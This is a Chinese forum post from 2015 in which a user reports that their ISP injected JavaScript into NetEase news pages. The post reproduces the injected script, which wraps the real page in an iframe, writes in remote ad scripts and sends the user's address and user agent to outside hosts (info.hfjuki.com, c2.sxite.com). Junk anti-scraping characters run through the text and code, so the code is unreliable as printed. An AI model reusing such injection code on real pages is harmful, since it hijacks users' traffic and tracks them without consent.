|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
2 \. r3 |8 r& p! h. q4 w5 j
* i1 F4 \( k9 A. N* i% D上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
9 w9 [; P1 I2 ^4 H, o4 q3 C6 [* i5 i& u& v9 B
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}! s/ Q r5 a& E
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197 0 A& H" n% q- ]( z* w6 U
' _. Z7 J/ F7 O. y顺便查下ip138:
7 F8 N% ~, w0 r/ @+ w/ w. ~
/ H8 c. \& f( p) s6 S这是那段js里面的代码,好象是个半成品还没写入广告数据:
: p. q, b( x/ q- function locationSearch() {
/ x/ C& V! F7 L5 D - var s = getMainJs();% b/ O, G: ~. M7 R4 t6 Q; j) F
- if (s == null) {; }6 |, o) D8 M+ o; a
- location.reload();
7 `& D# G1 X8 S - }
: Z5 \! }" p I6 ]( ^% L - return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
/ S+ O; ]8 } `! N1 x; D - }
$ @ g: \6 _# r' N0 Y5 ^- A6 s
' W' F* d$ s8 C! I; M! d- function getParameter(name, paraStr) {+ z+ U; s; ~$ | R
- var result = "";8 ?- |; l# i, E/ O Z4 i1 p
- var str = "&" + paraStr.split("?")[1];
; J2 K9 S7 v* O6 d) @1 O% a! S V - var paraName = "&" + name + "=";, A6 d! {$ C6 m) M- [
- if (str.indexOf(paraName) != -1) {& W! {5 e/ ]: U. z* |
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {! Q* ]/ x% H4 D H* M
- var TmpStr = str.substring(str.indexOf(paraName), str.length);! M) [& |" j/ P' u+ I
- result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(
- e, Z) z3 f- M5 N# t - 1, TmpStr.length).indexOf("&")
- M$ K4 m6 W" T$ N* H - - TmpStr.indexOf(paraName) + 1);6 @* C$ N' P. `4 O$ A& F
- } else {' t2 ?- x- e7 ?7 r: k# W
- result = str.substring(str.indexOf(paraName), str.length);7 U |1 G: N! a9 K* h
- }; M5 v9 w/ V2 P7 ~+ A& k) W1 C
" H6 K2 f3 T9 J2 _; ^- result = result.substring(result.indexOf("=") + 1, result.length);
+ A6 c1 q# K, \ - } else {/ g/ P* L9 I; x* F, ]/ ?+ |
- result = "No such parameter";5 |7 O O9 Y# ~7 k3 `0 R- M* Q& b2 N
- }
e$ f5 T; X* B+ b: j - return (result.replace("&", ""));
4 N1 U; {9 z1 `% a - }
3 c' c' r! B4 p! ?
* I2 w/ q. P2 w' h- function getMainJs() {
# r% E% j9 m, D+ m - var scripts = document.getElementsByTagName("script");# J6 A1 }2 M% u3 H& I3 c3 b
- var s = null;: b# R# m- h) Q1 @2 {- H1 R
- for (var i = 0; i < scripts.length; i++) {
. U% r# h: ^! U3 F: T# X) { - if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
4 r7 g9 O, V& P - s = scripts[i];
+ c' K% `" P- K - break;
( t6 ]( w Z9 n+ k - }/ i/ G9 [3 W* A5 X, e8 T
- }
& \6 q, }7 H. E+ @ - return s;
5 I$ |4 e B l& T: O - }5 z6 M, Y+ I) s `" L
- 2 I1 Y$ S8 Y% r3 B2 s4 w5 V
- function appendParam(oStr, aStr) {
+ F) r9 n8 B+ p! Z - if (oStr.indexOf('?') > 0) {8 B$ G, B+ P+ w3 d
- oStr = oStr + "&" + aStr;/ V. M4 \; N8 U; v, n% ?, [! H/ W
- } else {. @/ v) Z- i0 R6 I6 Z9 d2 f4 U
- oStr = oStr + "?" + aStr;
0 [% r. w1 _' \) a$ s. g - }
& v8 F, e/ D1 C6 n0 ]: | - return oStr;+ i0 t% ^4 D' p8 d8 I- v, z) k
- }
% A: F ?# i5 O8 O( S! X
0 ]! }4 I+ H1 a/ u; y; a- window.onerror = function() {
0 m: [6 n; x/ u9 z" |1 e - };/ t( S4 b1 @8 u+ j1 i5 |" Q) s& o
7 g7 v' N9 L% A& @1 e% g/ _- var g_titleTime = 0;
/ @, D3 r; S% E/ F. a - function setTcTitle() {
! X0 x) P; D# _( y% b - if (undefined == document) {
: p% T' s! I5 T4 p4 T6 G - g_titleTime++;9 }5 I' V1 l* I! a/ z% C. Z3 |% X
- setTimeout("setTcTitle();", 1000);
x8 t4 J1 E0 [. `9 g! s1 m - return;0 s8 K6 s$ q1 Q6 ]
- }5 j; c6 R5 c7 G3 |; {7 t
- 5 B1 L# g% T& t$ E; z
- var doc;1 W! d9 ]4 ?" M3 Y
- try {
" B& u" r3 {2 w0 C0 c3 D - if (document.all) {8 Q, e2 q) {% f7 Y( j- N
- doc = document.frames["cn"].document;# E& r. ^+ c9 S$ A Q2 C H9 `
- } else {8 D1 j' a' N! i5 Y5 O7 M
- doc = document.getElementById("cn").contentDocument;+ J6 {5 s" Q! g1 ]" u( C% T2 U, F
- }$ n) {' a+ j, @, b- {
- } catch (ex) {/ J% G0 p+ F9 }: L' c# l
- }
" W; g" E8 T5 p% g$ _
: R: f3 d6 n9 Y' U1 ~- if (g_titleTime < 5
# u3 R. ]6 w" x) J) b* V. P - && (undefined == doc || undefined == doc.title || "" == doc.title)) {
5 U6 b- O- F$ \# H9 h" t - g_titleTime++;
$ K O1 ~* ^& K( e7 w+ v: h8 {) H - setTimeout("setTcTitle();", 1000);
/ f# e! U v7 p- } - return;
% F4 g) Q% n3 q; p$ i0 I - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {' R* a# j" `/ e% m' P& o
- document.title = doc.title;
0 K' Z8 l! C9 I% T# a& D - setTcAdvVisible();- x5 ~( u; w. L; G6 R) D
- }
( J5 y4 o9 o H+ l% e - }2 z) f, `6 Q* i: S( q# K
2 Z4 P8 a) P' q- setTimeout("setTcTitle();", 1000);8 ~! [2 q+ P1 i/ [% @
9 x1 ?8 I$ j' d S: A* w/ S) H- var g_isHaveVisible = false;5 V" v/ P( Z/ d! t$ z* M& s
- function setTcAdvVisible() {% ~1 o. |0 V$ t4 L
- if (undefined != document && undefined != document.getElementById("addiv")6 J' P( M4 g* W6 B
- && !g_isHaveVisible) {/ L: S5 r! W+ X* _
- document.getElementById("addiv").style.visibility = 'visible';
0 s: P, G% w6 J! _) H$ z& \9 o - document.getElementById("addiv").style.display = 'block';
! z& k: o' J; Z( T - g_isHaveVisible = true;
: X9 [) @8 r7 ^+ r' t - }" ^: V+ A+ ?5 Y9 q0 X- w
- }3 C2 k' d6 D C3 v/ L2 A
- 3 E. `/ Y: {$ ~. o) ~
- function UrlAnalyzer() {
' {. g; ^" _0 h6 g9 Y - this.divda = "";
0 x% @( v% y d" r - this.tctype = "";
6 I( E% M2 G) }4 C - this.radius = "";
9 Q. X4 c" { p0 ^: ~ - this.rlu = "";
9 b. O: {. v* s3 j - }
% Z1 V; i3 }( ]3 j! A% W0 }+ z
+ P3 l- f; y7 V+ W) ^( \( a4 l+ f- UrlAnalyzer.prototype.initParameters = function() {3 V x0 U9 K8 y6 D9 h5 S2 Z) W
- var paraStr = locationSearch();
- t* O/ d4 F1 ` - this.rlu = getParameter("lruedct", paraStr);% A# o6 a U) T9 n3 H( c
- this.divda = getParameter("divda", paraStr);
. j) K U7 l% R+ Z! C, L2 K& l - this.radius = getParameter("radius", paraStr);
# n3 t* c; T0 o3 C. I - this.tctype = getParameter("tctype", paraStr);! u% I3 H% Y& g- z5 t: J
- this.address = getParameter("address", paraStr);/ F& b0 \. i( {- [ n8 n
- this.usagent = getParameter("usagent", paraStr);2 W- T$ f* |2 z( _. t
- }
; U+ @2 `" T1 C3 {9 e; y8 a$ d - 6 a4 A% C4 n& y Y0 H
- UrlAnalyzer.prototype.getHtmlDoc = function() {4 F1 v2 x" [7 U, G e7 h
- var doc;
! F* e# R4 A' j! _ - try {
/ ]* h) O& e- c6 |* a5 s+ W - if (document.all) {
1 O' d& } y/ B. x - doc = document.frames["cn"].document;
/ a! E' T$ g; ]7 G' p% o - ) N O0 |% E! f8 A& g4 H* z
- } else {
7 Z: c6 e* j- V - doc = document.getElementById("cn").contentDocument;+ A6 h: p n$ o+ T5 x5 e/ l
- // doc = document.getElementById("cn").contentWindow.document;8 c+ [- l0 ^5 M( ?7 N" z/ m; X+ [
- }
8 c- L" {$ R' f- w( [ - } catch (ex) {
g/ p Y+ W! Q - }
! W6 u" c2 A' w: c# E! I - return doc;9 |& J' c# u5 X7 f
- }- I4 x: b) n+ |$ P- B9 M( j3 g; i
- ) V8 @6 K; r1 B; H; P
- UrlAnalyzer.prototype.setDomain = function() {* T- @$ L& V: q3 e( ^7 P' z
- if (undefined != document.title && "" == document.title)$ h/ t' R1 x" f: ^9 p% D
- {
: _9 f, n8 u% V. K# C0 Q4 ^1 m, r - var index = document.domain.indexOf(".");/ \! D- Z# t6 w: V8 G& [! U7 F
- if (undefined != index && -1 != index) {
# `0 e" n' K/ Z A& R2 Z - document.domain = document.domain.substring(index + 1,3 k2 k2 O/ i, u. m l: h; M2 v
- document.domain.length);; a& A, S6 F' ^7 Y, D
- }
# s5 `3 E2 M/ ] - 1 F9 r \4 d5 Q
- var doc = this.getHtmlDoc();5 g0 D+ A. ^- f- w, P% G
- if (undefined != doc && undefined != doc.title && "" != doc.title) {% Y4 ~' M* P) t
- document.title = doc.title;
! _8 A) @3 T4 U V1 v2 G/ P - setTcAdvVisible();5 D- `7 _, ]4 r
- }" f5 X! |; [0 b
- }1 b$ h( v/ t I4 n( a- s2 I
- }( y- x- y1 m+ Z4 @/ O3 a$ e4 |
+ u" j. l+ } q! t) u- UrlAnalyzer.prototype.iframeCallback = function() {$ l& ]- o/ W2 G/ j
- var doc = this.getHtmlDoc();; P+ E4 M* E4 Y" D t1 G: i& M
- if (undefined == doc || undefined == doc.title || "" == doc.title) {/ ]% ?9 l; @ Q5 J) q, Z. }! ~
- if (undefined != document.domain) {
: x* r2 s1 D* u, ^; x' r
1 H$ h. c+ }4 Z9 z& }/ W5 j3 p- var self = this;
% | {" R$ ^( U: I2 K - setTimeout(function(){self.setDomain.call(self, null)}, 1000);
$ |, @2 {$ ~/ j( U2 Y5 o+ h) O - // var index = document.domain.indexOf(".");
; i3 W/ ^3 g) o* E - // if (undefined != index && -1 != index) {' j+ w4 R" u# p; Y" T4 U8 V0 x, F2 w
- // document.domain = document.domain.substring(index + 1,
! s" n1 i3 O' C - // document.domain.length);
9 t1 I2 T% S7 B, F- [ - // }
2 i- e4 E: C* A( g! B - //
" i* ?1 g% f9 J6 J# f - // var doc = this.getHtmlDoc();
4 B; b" Y: g* a! G$ _. U - // if (undefined != doc && undefined != doc.title && "" !=' }& [: B0 h ?0 E
- // doc.title) {
' O- t! I$ w, X) V3 G0 `: U! w* i6 v - // document.title = doc.title;
/ `! q1 _- w$ b0 l+ _7 N - // setTcAdvVisible();
N2 F6 F8 R0 m' k8 N0 H, ^3 A5 ? - // }
3 M! w) V/ I3 O2 f - }
- ^+ Y6 I3 o, p4 [; a2 { - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
5 [, L2 n5 ]9 |# r3 _: M. ^ - document.title = doc.title;$ T3 }7 N9 b" X9 x% O% T
- setTcAdvVisible();
% q! H& c* r/ k - }7 Q1 P- u# W0 O
- }) {1 t" J1 z- j' s
- 1 }5 \9 N: z/ }/ G3 Q/ z) X3 _
- UrlAnalyzer.prototype.executeHtmlContext = function() {0 w5 \7 [% r. P% P5 x6 K
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
& V6 m% n0 [9 \ - + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;
) x, D) i1 w7 p# a- F' z
6 T' [ u [! i; _$ D+ O- y2 G- var htmlStr = "<iframe src="" + staUrl
; q) I$ U& I6 q% u7 y - + "" style="display:none"></iframe>";! z/ C1 s+ T0 X2 v( W; {. G
- 5 |9 Y4 R4 O5 J- O
- var advUrl = htmlStr
3 u/ o( O( f8 m0 L$ [, u - + "<script src="http://c2.sxite.com:8060/center?advId="/ J; L, O& v- c0 S
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";6 S: k8 l4 c" K8 n) G- T! E4 Y
- document.write(advUrl);
# |$ ]8 t5 L$ y% A/ r/ g" R - 5 C' N( D% d2 t# G
- var self = this;, \1 k+ W% i# S; C$ g/ U$ J% \! P
- var iframe = document.getElementById("cn");) f0 C8 ]4 `. c
- if (iframe.attachEvent) {- b2 d8 }/ q8 I5 |/ u5 q; {
- iframe.attachEvent("onload", function() {
& c. k$ j1 ?8 f( n% ` - self.iframeCallback.call(self, null); p5 P; ?+ Q% G; r! x) G
- });
8 Y3 p! q8 C! H& X - } else {
. Q$ _) u- \& E+ A9 S& O - iframe.onload = function() { X, [: c+ o$ H6 q1 f
- self.iframeCallback.call(self, null);7 f1 i/ t: Q( B& J! h. }/ H6 i
- }
* _; p7 u7 o, {5 \, F, ?1 S - }% e9 |8 H1 E8 Q* @0 d" H! |
- }4 Q& P- {' }8 W; G* [+ {# C
- ' i, U) _# K" Q% H2 `
- UrlAnalyzer.prototype.executeMain = function() {
: s) h0 e4 P7 a - var mainFrame = document.getElementById("cn");
* [' f! d5 Z# Y: j - mainFrame.contentWindow.location.href = mainFrame.src;& e, f* A8 }. @. l% i% f" y5 ^' d& Z
- this.initParameters();+ d' }8 p+ V9 V
- this.executeHtmlContext();9 s# x) }! {* E5 ^
- }% G O+ r3 n, [: K* x
+ P; q5 h: p- m/ I- var g_analyzer = new UrlAnalyzer();2 ?; N# Z3 f# n& g% }
- g_analyzer.executeMain();& e! o6 l7 I6 B$ N3 q( `- g
复制代码 T8 f8 y6 r- A- i' }' ]
$ b c% u' h5 B
L8 [" w# n5 n8 \1 W/ E8 j. B9 Y
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|